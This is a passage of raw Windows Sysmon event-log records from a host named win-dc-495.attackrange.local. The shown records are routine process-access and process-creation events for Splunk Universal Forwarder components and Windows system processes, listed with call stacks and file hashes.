Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.150{59A5CD1D-93DC-6005-E204-00000000A301}44443224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 